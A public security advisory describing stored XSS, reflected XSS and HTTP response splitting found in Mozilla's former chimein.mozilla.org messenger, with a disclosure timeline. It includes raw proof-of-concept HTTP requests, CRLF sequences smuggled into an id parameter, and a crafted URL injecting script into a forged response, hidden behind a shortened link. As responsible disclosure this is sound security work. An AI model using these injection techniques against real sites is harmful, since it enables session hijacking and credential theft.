######################################################################
# Exploit Title: Mozilla.org sub-domain Stored-XSS - Reflected-XSS - HTTP Response Splitting
# Date: 03/04/2017
# Author: Yann CAM @ Synetis - ASafety
# Vendor or Software Link: www.mozilla.org
# Version: /
# Category: Stored Cross Site Scripting / Reflected Cross Site Scripting / HTTP Response Splitting
# Google dork:
# Tested on: mozilla.org chimein sub-domain
######################################################################
Mozilla description :
======================================================================
Mozilla is a free-software community, created in 1998 by members of Netscape. The Mozilla community uses, develops, spreads and supports Mozilla products,
thereby promoting exclusively free software and open standards, with only minor exceptions. The community is supported institutionally by the Mozilla
Foundation and its tax-paying subsidiary, the Mozilla Corporation.
Mozilla produces many products such as the Firefox web browser, Thunderbird e-mail client, Firefox Mobile web browser, Firefox OS mobile operating system,
Bugzilla bug tracking system and other projects.
Vulnerabilities description :
======================================================================
The Chimein.mozilla.org sub-domain (access via HTTPS) provides a secure web messenger application. This application needs autrhentication.
Each user is authenticated with a "login / password". Then, to sent message to other user, a public/private key is used to encrypt and sign message.
The private key is protected via a passphrase.
This secure web messenger application contains several vulnerabilities :
- A stored XSS is available in the body of each message sent encrypted to other users.
Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Mozilla portals, or capture Mozilla's users credentials such key/password.
- A reflected XSS is available in the sign up process (login).
Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Mozilla portals, or capture Mozilla's users credentials such key/password.
- A HTTP Response Splitting is available in the "/message/get" endpoint.
This vulnerability can be used to create Reflected XSS.
Proof of Concept ndeg1 : Stored Cross-Site Scripting
======================================================================
The chimein.mozilla.org domain (https://chimein.mozilla.org/) provides a very simple "sign up / sign in / send message" process with asymetric encryption (public key,
private key, password and passphrase) to add a strong security for message exchange.
A simple user can create an account, log in with this account, and send encrypted message (with passphrase) to any other user registered.
There are some XSS vulnerabilities. The most critical is a Stored-XSS in the body of any message. A user will be able to create an account as describe here :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_001.png
Login = ycam, password = ycam, passphrase = ycam
Then, once logged in, the user can sent an arbitrary message to any other user (in the example, the message is sent to the user himself for the Proof of Concept) :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_002.png
The Stored-XSS payload can be injected in the "body" of the message. The user selects a specific passphrase, so the payload is encrypted.
Once sent, the message is visible for the receiver logged. When this victim-user clic on the message, he has to enter the passphrase used at encryption time.
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_003.png
When the passphrase is indicated, the body of the message is decrypted and the Stored-XSS is triggered (PoC : alert(document.domain)).
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_004.png
Stored-XSS are very critical vulnerabilities and can be used by an attacker to steal private information such as session cookie or credential. Through XSS, an attacker
can tamper with page rendering, take the control of the full browser and can use browser's exploits to gain privilege on local system (especially with dedicated
framework for XSS flaw like BeEF : http://beefproject.com/).
This Stored-XSS was tested successfully with the latest Firefox version 49.0.2, latest Chrome version 53 and the latest IE version 11.
In this case, the main Stored-XSS is embeded in a personal message didacted to a victim (the victim needs to enter the passphrase to decrypt the message's body and
trigger the payload). This is a serious issue because the XSS is located in a very secure chat system with asymetric encryption used.
An attacker will be able to create fake page, fake prompt, fake "re-authentication" process to steal victim's password. If the attacker gains access to a victim's
account, he can used all the feature of the secure chat in place of the legitimate user.
PoC - HTTP request sample (with encrypted payload) :
POST /message/create HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://chimein.mozilla.org/
Content-Length: 1483
Content-Type: text/plain;charset=UTF-8
DNT: 1
Connection: close
login=ycam&password=ycam&sender=ycam&recipient=ycam&subject=ycam&subject_signature=C2sgosxgaKPEqJJwLb5R29A8fqX9wxA30SLqcJzKLkhEDVuAIIZesho736eDtI7GbrjpFBgc9I8E%0D%0A%2FPMRAbK6IZF9O9G%2BkOmy9a%2FmSPY9L8yiFdwk8CXzW%2Fnvmirx3qelwQ87z3cgrxGe8um7Ntc603h2%0D%0AWrux3wQrv5JptqEMC1Cj%2BatQQQ%2FB6ahv9Q6K2z7wmIViR1mcZuNG9V26PwierLoNNOBDwXmChsPI%0D%0AKpy%2F0TgJhkpWj%2BPO3YIvxy015imeISUgmZyTmOaJAy7%2FOQzvw5GUAS5nTG%2FtU79kO7AlhQLTgjlL%0D%0AE3uKE2jM2ACuwtqZNeSpNTUeyGBLCxHD18vqMw%3D%3D&body=O8E%2BSCVlBZiL8xsg0yEg%2BK5%2BjdHKkuQA89z8FpLDekOT3CUa43B%2FQw%2BBxyCTgccngdRp7en7Zi%2BM%0D%0AwMgDouqt8f1NGa8hxk4xP0lxN0vsR8dz1DyY2etgtGtSY8ehWDoK&body_signature=kFLh%2BgNR1Ow2zuxqRebnYmiB%2FN2GEYWSFdLdK4dfdM2N5pKJw5eXsfu1YyKkznYEHU1c1z%2BYF13e%0D%0AzyWBWtwmSPff%2B6JFWIHGqYI2RR%2BqszbAduHwHSniFPkz0gKntc%2FxOe8GFX62z78pAPJfZ4tLyg8p%0D%0ALobVsLDjaipcRsy4tC0LWz56zjCWbACKPP9Gwi0VGng2Ny3KYoTSt%2B6t7GkCWf799ztY8R0WYJ8q%0D%0AskQAYD5LuHpdadi8%2B8RDdgYOaepyYPGfjuhJXXsqec9rivk84mkZSa8cAtXgrFF4bnj%2BF9z8KFgc%0D%0AvhiVAG71i65AVRbJ6pPR2CKjnnOhSkBjldNIuQ%3D%3D&session_key=a3EPAkTnptCVn9FSgmfTkpgzgjQgOGuYLFG%2BMmtmZjcwAPJjXePxH8%2F1XWWolhPn1fRmf4j9ybmo%0D%0AlXYOg4Fj1ss8k2HRcugxridBTkZ53dd0Af0qEHeSsiA1Rsm0d2G76k6qsWzgD55WBc6nuEXiOrzM%0D%0ATxVPIcT%2FvLbjTA0hrnzmm%2Ftiyq31YPVOYq3Di95urw38DFJIRPKiP%2FcJ0GoWkUrcB6OK8lCfvx0K%0D%0AWsS%2BPpAB%2Fc1xBUoG0TmFKZRkCXx8toykvz7cqC6hwZHbWRj4A5cLbnIrYdIXZ%2B2AkjhwcNzqWHQb%0D%0AHHm1wN6fkalHKXW7%2BwM2ctioB1JaE3gYE7WmGA%3D%3D&session_key_iv=zOtfAHFpmaW%2Bhm2xcJhPxw%3D%3D&
Proof of Concept ndeg2 : Reflected Cross-Site Scripting
======================================================================
There is another Reflected XSS vulnerability in the "login" text input during registration (the user login needs to be new at each sign up) :
Payload injection :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_001.png
Reflected XSS fired :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_002.png
Proof of Concept ndeg3 : HTTP Response Splitting leverage to Reflected XSS
======================================================================
Exchange requests are made through API call, for example when a user POST a message, it's the "/message/create" entry point which is called.
To list message "/message/list", and to consult a specific message the following request is made (as example, the message ID : 57 owned by
the user ycam with password ycam used as Proof of Concept) :
POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
login=ycam&password=ycam&id=57
The resulting data are like (JSON) :
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 1525
Date: Fri, 21 Oct 2016 00:05:14 GMT
Connection: close
{"id":57,"sender":"ycam","recipient":"ycam","subject":"ycam","subject_signature":"C2sgosxgaKPEqJJwLb5R29A8fqX9wxA30SLqcJzKLkhEDVuAIIZesho736eDtI7GbrjpFBgc9I8E\r\n/PMRAbK6IZF9O9G+kOmy9a/mSPY9L8yiFdwk8CXzW/nvmirx3qelwQ87z3cgrxGe8um7Ntc603h2\r\nWrux3wQrv5JptqEMC1Cj+atQQQ/B6ahv9Q6K2z7wmIViR1mcZuNG9V26PwierLoNNOBDwXmChsPI\r\nKpy/0TgJhkpWj+PO3YIvxy015imeISUgmZyTmOaJAy7/OQzvw5GUAS5nTG/tU79kO7AlhQLTgjlL\r\nE3uKE2jM2ACuwtqZNeSpNTUeyGBLCxHD18vqMw==","body":"O8E+SCVlBZiL8xsg0yEg+K5+jdHKkuQA89z8FpLDekOT3CUa43B/Qw+BxyCTgccngdRp7en7Zi+M\r\nwMgDouqt8f1NGa8hxk4xP0lxN0vsR8dz1DyY2etgtGtSY8ehWDoK","body_signature":"kFLh+gNR1Ow2zuxqRebnYmiB/N2GEYWSFdLdK4dfdM2N5pKJw5eXsfu1YyKkznYEHU1c1z+YF13e\r\nzyWBWtwmSPff+6JFWIHGqYI2RR+qszbAduHwHSniFPkz0gKntc/xOe8GFX62z78pAPJfZ4tLyg8p\r\nLobVsLDjaipcRsy4tC0LWz56zjCWbACKPP9Gwi0VGng2Ny3KYoTSt+6t7GkCWf799ztY8R0WYJ8q\r\nskQAYD5LuHpdadi8+8RDdgYOaepyYPGfjuhJXXsqec9rivk84mkZSa8cAtXgrFF4bnj+F9z8KFgc\r\nvhiVAG71i65AVRbJ6pPR2CKjnnOhSkBjldNIuQ==","session_key":"a3EPAkTnptCVn9FSgmfTkpgzgjQgOGuYLFG+MmtmZjcwAPJjXePxH8/1XWWolhPn1fRmf4j9ybmo\r\nlXYOg4Fj1ss8k2HRcugxridBTkZ53dd0Af0qEHeSsiA1Rsm0d2G76k6qsWzgD55WBc6nuEXiOrzM\r\nTxVPIcT/vLbjTA0hrnzmm/tiyq31YPVOYq3Di95urw38DFJIRPKiP/cJ0GoWkUrcB6OK8lCfvx0K\r\nWsS+PpAB/c1xBUoG0TmFKZRkCXx8toykvz7cqC6hwZHbWRj4A5cLbnIrYdIXZ+2AkjhwcNzqWHQb\r\nHHm1wN6fkalHKXW7+wM2ctioB1JaE3gYE7WmGA==","session_key_iv":"zOtfAHFpmaW+hm2xcJhPxw==","status":"read","sent_date":"2016-10-20T23:05:30.009Z","retrieved_date":"2016-10-20T23:06:45.811Z","read_date":"2016-10-20T23:06:48.066Z"}
Screenshot :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_001.png
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_002.png
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_003.png
If a user changes the value of the "id" in POST param of the initial request, the following error is retrieved :
POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
login=ycam&password=ycam&id=xxx
Error received :
HTTP/1.1 500 message xxx does not exist
Date: Fri, 21 Oct 2016 00:07:11 GMT
Connection: close
Content-Length: 0
Screenshot :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_004.png
There is a reflection of the "id" value in the HTTP headers returned by the server.
With the sequence %0a%0d (\r\n), an attacker can forge headers and responses content himself :
POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
login=ycam&password=ycam&id=xxx%0a%0dyyy%0a%0dzzz%0a%0d
Response :
HTTP/1.1 500 message xxx
yyy
zzz
does not exist
Date: Fri, 21 Oct 2016 00:08:40 GMT
Connection: close
Content-Length: 0
Screenshot :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_005.png
So, with a specific payload, an attacker can forge his own response from the server with the right headers (Content-Type: text/html)
and arbitrary source code. Plus, the payload can be sent directly in GET param or in POST param. In GET, the vulnerability is more easy
to sent to victims :
https://chimein.mozilla.org/message/get?login=ycam&password=ycam&id=x%0a%0dContent-Length: 100%0a%0dContent-Type: text/html%0a%0d%0a%0d<html><body><script>alert(document.domain)</script></body></html><!--
Or hidden with the url-shortener bit.ly :
https://mzl.la/2eypf8b
Screenshot :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_006.png
Tested successfully with the latest Firefox version 49.0.2.
HTTP response splitting is a form of web application vulnerability, resulting from the failure of the application or its environment to
properly sanitize input values. It can be used to perform cross-site scripting attacks, cross-user defacement, web cache poisoning, and
similar exploits.
Screenshots :
======================================================================
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_001.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_002.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_003.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_004.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_001.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_002.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_001.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_002.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_003.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_004.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_005.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_006.png
Solution:
======================================================================
Fixed by Mozilla security team.
DNS entry "chimein.mozilla.org" deleted
Additional resources / article and screenshots :
======================================================================
- https://www.mozilla.org
- https://bugzilla.mozilla.org/show_bug.cgi?id=1311883
- https://bugzilla.mozilla.org/show_bug.cgi?id=1311887
- https://bugzilla.mozilla.org/show_bug.cgi?id=1312034
- https://www.mozilla.org/en-US/security/bug-bounty/web-hall-of-fame/
- http://www.asafety.fr
- http://www.synetis.com
- https://www.asafety.fr/vuln-exploit-poc/contribution-mozilla-http-response-splitting-reflected-stored-xss/
Report timeline :
======================================================================
2016-10-20 : Mozilla security team alerted with details and PoC (via 2 BugZilla submissions)
2016-10-21 : Mozilla response and fix issues via DNS entry deletion.
2016-10-21 : Mozilla acknowledgement (out of scope for the Bug Bounty, but eligible to some goodies)
2017-04-03 : Mozilla acknowledgement on Mozilla Web and Services Hall of Fame (2016Q4)
2017-04-04 : Public advisory
Credits :
======================================================================
88888888
88 888 88 88
888 88 88
788 Z88 88 88.888888 8888888 888888 88 8888888.
888888. 88 88 888 Z88 88 88 88 88 88 88
8888888 88 88 88 88 88 88 88 88 888
888 88 88 88 88 88888888888 88 88 888888
88 88 88 8. 88 88 88 88 88 888
888 ,88 8I88 88 88 88 88 88 88 .88 .88
?8888888888. 888 88 88 88888888 8888 88 =88888888
888. 88
88 www.synetis.com
8888 Consulting firm in management and information security
Yann CAM - Security Consultant @ Synetis | ASafety
--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr